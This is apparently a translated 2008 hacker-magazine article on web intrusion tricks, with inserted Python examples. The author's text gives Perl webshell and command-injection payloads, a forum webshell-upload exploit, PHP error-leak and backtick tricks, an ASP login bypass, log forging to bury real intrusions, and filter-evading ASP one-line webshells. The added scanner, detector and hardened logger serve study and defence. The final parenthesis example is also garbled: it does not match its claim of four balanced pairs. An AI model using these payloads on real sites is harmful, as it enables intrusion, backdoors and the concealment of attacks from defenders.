Details I noticed during the intrusion process (2)


Hacker manual 200802
LCX

In the previous installment I wrote about the details worth noticing while moving through an intranet. Injection is what everyone does now, and the usual targets are dynamic scripts: ASP, PHP, JSP, CFM and CGI. Whichever language you are up against, paying attention to small details, such as constructing special characters, pays off handsomely. The earliest examples, the %5c database dump (a %5c in the request path provokes an error message that leaks the physical path of the Access database) and %00 truncation, were sensational vulnerabilities in their day, and each of them came down to noticing one detail of how the script language or the server handles input. In this installment I go through the details I watch for during injection, mainly special symbols.

Perl first. I am not familiar with this language; after all, it is rarely used for server-side scripting any more. There are probably two common ways to break in through Perl. One is to write a webshell into a .cgi file; the other is to abuse the site's own Perl program to execute commands. For the first, what usually gets written is ;system @ARGV;# (the CGI interface fills @ARGV from the query string, so the command arrives as the script's arguments): if it is written into 1.pl, you can then execute 1.pl?dir=c. For the second, if the original page URL is http://www.xxx.com/1.pl?id=abc, we try http://www.xxx.com/1.pl?id=abc|uname to see whether the uname command runs. Strictly speaking, | is a separator of the Linux shell, not of Perl, although Perl's two-argument open() treats a trailing | as "run this as a command", which is what lets the injected uname run when the parameter ends up in an open call. Perl does have a separator of its own, though, and few people notice it. There was once a very famous forum called Lei'ao. It seems the latest version still has a vulnerability that lets you upload a webshell, as long as the back end does not restrict special symbols when registering user accounts. A long time ago I broke into a Lei'ao forum; the attack was still in progress at the time, as shown in Figure 1.


Figure 1

We register an account named q lcx, then post the content and rename(qq(physical path of the attachment you uploaded), qq(physical path you want the webshell renamed to)), as in the example. Browsing the post then gives you a webshell. The separator here is the q quote operator: in Perl, q means single quotes and qq means double quotes, the delimiter can be almost any character, and whitespace is allowed between the operator and the delimiter. So in q lcx... the delimiter is l, and everything from there up to the next l becomes a harmless string literal. The messy content in between is therefore meaningful to Perl, and it does not interfere with the execution of the rename function that follows.
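To make the quoting rule concrete, here is an added example, written in Python rather than Perl and not taken from the article or from Lei'ao: a small scanner that applies the perlop delimiter rules to a constructed line of the shape the attack produces. The forum's real record layout is not described on this page, so the text between the username and the post body is made up; the point is to show that q l turns everything up to the next l into a string literal and leaves the rename(...) call as live code.

```python
"""Scanner for Perl's q// and qq// quote-like operators.

Added example (not code from the article or from Lei'ao). It models the
perlop rule that whitespace may sit between the operator and the delimiter,
which is what lets a username such as "q lcx" turn the text up to the next
"l" into a string literal when it is spliced into Perl code that gets eval'd.
"""
import re
from collections import namedtuple

Literal = namedtuple("Literal", "start end op delim body closed")

# A q/qq operator: not glued to a preceding identifier or sigil, and not
# followed by an identifier character ("qq" is one operator, "quote" is none).
OP_RE = re.compile(r"(?<![\w$@%&])(qq|q)(?!\w)")
BRACKETS = {"(": ")", "[": "]", "{": "}", "<": ">"}

# Constructed line: username "q lcx", some forum text containing no "l",
# then a post body that closes the literal with "l" and calls rename().
SAMPLE = ("q lcx posted at 2008-02-01 12:00 re: hi l and "
          "rename(qq(/www/attach/1.gif), qq(/www/cgi-bin/x.cgi));")


def find_quote_literals(src):
    """Return the q/qq literals in src, in source order.

    Rules modelled: optional whitespace between operator and delimiter;
    bracketing delimiters nest and close with their partner; any other
    delimiter closes at its next unescaped occurrence; '#' is a delimiter
    only when it directly follows the operator (after whitespace it starts
    a comment); a backslash escapes the next character.
    """
    found = []
    pos = 0
    while True:
        m = OP_RE.search(src, pos)
        if not m:
            return found
        k = m.end()
        while k < len(src) and src[k] in " \t\r\n":
            k += 1
        if k == len(src) or (src[k] == "#" and k != m.end()):
            pos = m.end()  # not a quote operator at this position
            continue
        open_d = src[k]
        close_d = BRACKETS.get(open_d, open_d)
        depth, p = 1, k + 1
        while p < len(src):
            c = src[p]
            if c == "\\":
                p += 2
                continue
            if open_d != close_d and c == open_d:
                depth += 1
            elif c == close_d:
                depth -= 1
                if depth == 0:
                    break
            p += 1
        if p >= len(src):  # Perl would die: "Can't find string terminator"
            found.append(Literal(m.start(), len(src), m.group(1), open_d, src[k + 1:], False))
            return found
        found.append(Literal(m.start(), p + 1, m.group(1), open_d, src[k + 1:p], True))
        pos = p + 1


def perl_view(src):
    """Render src the way the Perl parser sees it: each literal body is
    collapsed to <STR>, so what remains is the code that actually runs."""
    out, last = [], 0
    for lit in find_quote_literals(src):
        body_start = lit.end - len(lit.body) - (1 if lit.closed else 0)
        out.append(src[last:body_start])
        out.append("<STR>")
        out.append(src[body_start + len(lit.body):lit.end])
        last = lit.end
    out.append(src[last:])
    return "".join(out)


if __name__ == "__main__":
    for lit in find_quote_literals(SAMPLE):
        print(f"{lit.op}{lit.delim}...  body={lit.body!r} closed={lit.closed}")
    print(perl_view(SAMPLE))
```

In Perl the resulting statement reads '...' and rename(...): a non-empty string is true, and the low-precedence and then calls rename. Note the caveat the scanner makes visible: the delimiter is the first non-whitespace character after q, so had the forum's own text contained an l before the post body, the literal would have closed there and the rest would have been parsed as code.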

Now PHP. The most commonly used trick in PHP: if the URL is http://www.sohu.com/x.php?id=1, we change it to http://www.sohu.com/x.php?id[]=1. If error display is not turned off, the success rate should be as high as 60%, which puts it on a par with the early %5c trick. The value after id is normally a scalar; with [] appended, PHP builds $_GET['id'] as an array, and a program that treats it as a string (concatenates it into SQL, passes it to a string function, casts it) produces an error or warning that leaks path or query information. This is similar to changing id=1 to id=a or id=1', but some programs are not rigorous: if the code only filters single quotes and letters rather than checking the type of the value, an array slips through and we succeed. Another marginal symbol in PHP is the backtick, which is also an operator: <? $result = `ls -a`; echo $result; ?> executes the command. But as soon as safe mode is enabled (the backtick operator is disabled under safe mode, or when shell_exec is disabled) or the server's permissions are set strictly, this no longer works. And when an intrusion does succeed, is it ever anything other than the administrator's laziness?

Finally ASP, which everyone is familiar with. ASP's classics are the %5c database dump and the universal password 'or''='. I have also used %0d%0a before. Strictly this is not an ASP thing but an HTTP server thing: most HTTP servers decode a request containing %0d%0a into a carriage return and line feed, which wraps a line in the log. With ASP + MSSQL the pair can also serve as a separator for executing multiple SQL statements; for the specific application, search Baidu for the article <news cms4.0sp5 commercial version of the fatal injury>. On the HTTP server side, sending %0d%0a (or, in the %u encoding that IIS accepts, %u000d%u000a; note that %u0d0a on its own is the single code point U+0D0A, not a CR LF pair) puts line breaks into the log, so log entries can be forged. The real intrusion is then drowned in a large number of fake entries, the real intruder becomes hard to find, and intrusion analysis is thrown off.

ASP has another one, namely the percent sign. Many people have run into the % being filtered when uploading or writing a webshell, and so switched to the CS Trojan by 冰狐浪子 (Bingfox Langzi), which contains no percent sign. In fact ASP has another way of writing server-side code: <script language=vbs runat=server> ...... code ...... </script>. Into this we can put our usual eval(Request("#")), and no percent sign is needed.
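As an added example, not from the article, the log-forging point above worked through in Python: a hypothetical logger that writes the decoded request path into a W3C-style line, the forged record that turns one request into two entries, the check that flags such requests (including double-encoded ones), and the hardened logger that re-escapes control characters. The log format, addresses and timestamps are constructed, and the decoder's %u handling is included only to show what that notation actually yields.

```python
"""Log forging with %0d%0a: the naive logger, the check, and the fix.

Added example, not part of the article. The log format and the logger are
hypothetical stand-ins for "an HTTP server that writes the decoded request
path into its log"; the requests are constructed.
"""
import re

_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def decode_url(s):
    """Decode %XX escapes plus the non-standard %uXXXX form IIS accepted.
    %u takes exactly four hex digits, so %u0d0a is the single code point
    U+0D0A; CR LF in that notation is %u000d%u000a."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


# Constructed attack: a forged record follows the encoded CR LF. It carries
# no status field of its own; the real request's status completes it.
FORGED_RECORD = "2008-02-01 12:00:01 10.0.0.7 GET /index.asp".replace(" ", "%20")
ATTACK_PATH = "/index.asp?id=1%0d%0a" + FORGED_RECORD


def naive_log_line(ts, ip, method, path, status):
    """Hypothetical logger: decoded path written verbatim, one record per line."""
    return f"{ts} {ip} {method} {decode_url(path)} {status}\r\n"


def hardened_log_line(ts, ip, method, path, status):
    """Same record, but control characters in the path are re-escaped,
    so one request can produce only one line."""
    field = "".join(
        f"%{ord(c):02X}" if ord(c) < 0x20 or ord(c) == 0x7F else c
        for c in decode_url(path)
    )
    return f"{ts} {ip} {method} {field} {status}\r\n"


def parse_log(text):
    """Read records the way an analysis tool does: one per line, split on spaces."""
    return [line.split(" ") for line in text.splitlines() if line.strip()]


def is_log_injection_attempt(raw_path, max_rounds=3):
    """Detection: decode repeatedly (so %250d double encoding is caught) and
    flag any request whose path ever contains a CR or LF."""
    s = raw_path
    for _ in range(max_rounds):
        if "\r" in s or "\n" in s:
            return True
        decoded = decode_url(s)
        if decoded == s:
            break
        s = decoded
    return "\r" in s or "\n" in s


if __name__ == "__main__":
    ts, ip = "2008-02-01 12:00:00", "1.2.3.4"
    print("naive logger wrote:")
    for rec in parse_log(naive_log_line(ts, ip, "GET", ATTACK_PATH, 200)):
        print("  ", " ".join(rec))
    print("hardened logger wrote:")
    for rec in parse_log(hardened_log_line(ts, ip, "GET", ATTACK_PATH, 200)):
        print("  ", " ".join(rec))
    print("flagged:", is_log_injection_attempt(ATTACK_PATH))
```

The naive logger turns the single request into two records, and the second one, with its borrowed status code, is indistinguishable from a genuine hit by 10.0.0.7; the real record is left without a status. The check decodes a few rounds rather than once because %250d survives a single decode. The hardened line keeps all of the attacker's bytes, just escaped, so nothing is lost for later analysis.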

Since I know ASP best, a bit more on it. How can we mutate <script language=vbs runat=server>eval(Request("#"))</script>? We can write <script language=vbs runat=server>eval(Request(chr(35)))</script>, which gets rid of the quotation marks. Without resorting to encoding, what else can be changed? I would change it to <script language=vbs runat=server>eval((((Request(chr(35)))))))</script>: I added four matching pairs of parentheses and the script still runs. Can more be added? Of course ...... Can the same bracket trick be used in a PHP Trojan? Dear reader, the rest of the work is left to you.
